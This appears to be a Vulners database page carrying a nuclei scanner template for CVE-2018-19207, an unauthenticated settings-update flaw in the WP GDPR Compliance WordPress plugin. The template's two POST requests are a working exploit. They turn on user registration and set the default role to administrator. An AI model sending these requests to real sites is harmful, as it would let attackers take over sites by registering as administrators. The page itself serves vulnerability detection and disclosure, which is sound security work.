Lucene search
K

WP GDPR Compliance < 1.4.3 - Unauthenticated Call Any Action or Update Any Option

🗓️ 17 Jun 2026 05:14:44Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

WP GDPR Compliance plugin allows unauthenticated access to actions and database updates, critical flaw.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2018-19207
29 Nov 201819:43
circl
CNVD
WordPress Van Ons WP GDPR Compliance Plugin Elevation of Privilege Vulnerability
14 Nov 201800:00
cnvd
Check Point Advisories
WordPress GDPR Compliance Plugin Privilege Escalation (CVE-2018-19207)
24 Oct 201800:00
checkpoint_advisories
CVE
CVE-2018-19207
12 Nov 201817:00
cve
Cvelist
CVE-2018-19207
12 Nov 201817:00
cvelist
Metasploit
WordPress WP GDPR Compliance Plugin Privilege Escalation
29 Nov 201801:08
metasploit
NVD
CVE-2018-19207
12 Nov 201817:29
nvd
OpenVAS
WordPress WP GDPR Compliance Plugin < 1.4.3 Privilege Escalation Vulnerability
13 Nov 201800:00
openvas
OSV
CVE-2018-19207
12 Nov 201817:29
osv
Packet Storm
WordPress WP GDPR Compliance Plugin Privilege Escalation
31 Aug 202400:00
packetstorm
Rows per page
id: CVE-2018-19207

info:
  name: WP GDPR Compliance < 1.4.3 - Unauthenticated Call Any Action or Update Any Option
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    The WP GDPR Compliance plugin allows unauthenticated users to execute any action and update any database value. This vulnerability is due to the lack of proper validation in the Includes/Ajax.php file.
  impact: |
    Unauthenticated attackers can execute any action and update any database value, potentially creating admin accounts, modifying site configuration, or achieving remote code execution.
  remediation: |
    Upgrade to WP GDPR Compliance version 1.4.3 or later, or remove the plugin if no longer needed.
  reference:
    - https://wpvulndb.com/vulnerabilities/9157
    - https://github.com/aeroot/WP-GDPR-Compliance-Plugin-Exploit
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-19207
    cwe-id: CWE-425
    epss-score: 0.87294
    epss-percentile: 0.99728
    cpe: cpe:2.3:a:van-ons:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: van-ons
    product: wp-gdpr-compliance
    framework: wordpress
    publicwww-query: "wp-content/plugins/wp-gdpr-compliance/"
    verified: true
  tags: cve,cve2018,wordpress,wp-plugin,wp-gdpr-compliance,rce,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/"
    redirects: true

    extractors:
      - type: regex
        name: nonce
        part: body
        regex:
          - 'var wpgdprcData.*"ajaxSecurity":"([a-z0-9]+)"'
        group: 1
        internal: true

  - raw:

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpgdprc_process_action&security={{nonce}}&data={"type":"save_setting","append":false,"option":"users_can_register","value":"1"}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpgdprc_process_action&security={{nonce}}&data={"type":"save_setting","append":false,"option":"default_role","value":"administrator"}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"message":""'
          - '"error":""'
        condition: and

      - type: word
        part: content_type_2
        words:
          - 'application/json'
# digest: 4b0a00483046022100fff770af74c94119416c2682150aca04a78a2da4c3569e2657f3bcf4e9a63018022100d1f4fea0544c6e0f4ceaa124685b7e3ec16e3c509d406bd742625a81276a91a4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.5High risk
Vulners AI Score8.5
CVSS 27.5
CVSS 39.8
EPSS0.87294
22